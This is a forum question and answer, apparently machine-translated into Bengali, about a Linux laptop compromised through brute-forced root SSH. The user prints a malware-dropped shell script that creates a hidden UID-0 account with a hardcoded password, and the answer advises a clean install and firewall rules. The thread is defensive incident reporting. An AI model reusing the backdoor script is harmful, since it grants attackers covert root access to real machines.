আমার ল্যাপটপে ম্যালওয়্যারটি কীভাবে মোকাবেলা করবেন?

আমি মোটামুটি নিশ্চিত যে আমার উবুন্টু 13.10 ল্যাপটপটি কোনও না কোনও ম্যালওয়্যার দ্বারা সংক্রামিত হয়েছে।

প্রতি একবারে একবারে, আমি একটি প্রক্রিয়া / lib / sshd (মূলের মালিকানাধীন) প্রচুর সিপিইউ চালাচ্ছি এবং সেবন করি। এটি sshd সার্ভার নয় যা চালিয়ে যায় / usr / sbin / sshd।

বাইনারিটিতে --wxrw-rwt অনুমতি রয়েছে এবং এটি / lib ডিরেক্টরিতে স্ক্রিপ্ট তৈরি করে এবং স্প্যান করে। সাম্প্রতিক একটির নাম দেওয়া হয়েছে 13959730401387633604 এবং এটি নিম্নলিখিতটি করে

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

গুসার ব্যবহারকারী ম্যালওয়্যার দ্বারা স্বতন্ত্রভাবে তৈরি করা হয়েছিল এবং তারপরে 100% সিপিইউ গ্রহণ করার সময় chpasswd স্তব্ধ হয়ে যায়।

এখনও অবধি, আমি সনাক্ত করেছি যে গুসার ব্যবহারকারী অতিরিক্তভাবে / ইত্যাদি / তে ফাইলগুলিতে যুক্ত হয়েছিল

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

মনে হচ্ছে ম্যালওয়্যার "-" প্রত্যয় দিয়ে এই সমস্ত ফাইলের অনুলিপি তৈরি করেছিল। রুট দ্বারা সংশোধিত / ইত্যাদি / ফাইলগুলির সম্পূর্ণ তালিকা এখানে উপলব্ধ ।

উপরন্তু, / etc / hosts ফাইলটি পরিবর্তিত হয়েছে এই ।

/ Lib / sshd /etc/init.d/rc.local ফাইলের শেষে নিজেকে যুক্ত করে শুরু হয়!

আমি ব্যবহারকারীকে সরিয়ে দিয়েছি, ফাইলগুলি সরিয়েছি, প্রক্রিয়াজাতকরণের গাছটি মেরে ফেলেছি, আমার পাসওয়ার্স পরিবর্তন করেছি এবং ssh সর্বজনীন কীগুলি সরিয়েছি।

আমি সচেতন যে আমি মূলত বিভ্রান্ত, এবং সম্ভবত আমি পুরো সিস্টেমটি পুনরায় ইনস্টল করব। তবুও, যেহেতু আমি অন্যান্য বেশ কয়েকটি মেশিনে লগইন করেছি, কমপক্ষে এটি সরিয়ে ফেলার চেষ্টা করা ভাল হবে এবং এটি কীভাবে পেয়েছি তা নির্ধারণ করুন। এটি সম্পর্কে কীভাবে যেতে হবে সে সম্পর্কে যে কোনও পরামর্শ প্রশংসিত হবে।

দেখে মনে হচ্ছে তারা 25 শে মার্চ রুট লগইন করে জোর করে in আমার কোনও ধারণা ছিল না যে রুট ssh উবুন্টুতে ডিফল্টরূপে সক্ষম হয়। আমি এটিকে অক্ষম করে দিয়েছি এবং অস্বীকার করেছি।

লগইনটি 59.188.247.236 থেকে ছিল, সম্ভবত কোথাও হংকংয়ের।

আমি এম্পারারলিনাক্সের কাছ থেকে ল্যাপটপ পেয়েছি এবং তারা রুট অ্যাক্সেস সক্ষম করেছে। আপনার যদি সেগুলির মধ্যে একটি থাকে এবং আপনি এসএসডিডি চালাচ্ছেন সাবধান হন।

প্রথমে সেই মেশিনটি এখনই নেটওয়ার্কটি বন্ধ করুন!

দ্বিতীয়ত, আপনি কেন রুট অ্যাকাউন্ট সক্ষম করেছেন? আপনার যদি খুব ভাল কারণ না করে থাকে তবে আপনার সত্যিকারের অ্যাকাউন্টটি সক্ষম করা উচিত নয়।

তৃতীয়ত, হ্যাঁ, আপনি পরিষ্কার হওয়ার একমাত্র উপায় হ'ল একটি পরিষ্কার ইনস্টল করা। এটি আপনাকে পরামর্শ দেয় যে আপনি নতুন করে শুরু করুন এবং কোনও ব্যাকআপে ফিরে যাবেন না, কারণ আপনি কখনই নিশ্চিত হতে পারবেন না যে এটি কখন শুরু হয়েছিল।

আমি আপনাকে পরামর্শ দিয়েছি যে আপনি আপনার পরবর্তী ইনস্টল এ এ ফায়ারওয়াল সেট আপ করুন এবং সমস্ত আগত সংযোগগুলি অস্বীকার করুন:

sudo ufw default deny incoming

এবং তারপরে এসএসএসের অনুমতি দিন:

sudo ufw allow ssh

এবং রুট অ্যাকাউন্ট সক্ষম করবেন না! অবশ্যই নিশ্চিত হয়ে নিন যে রুট ssh লগইন অক্ষম রয়েছে।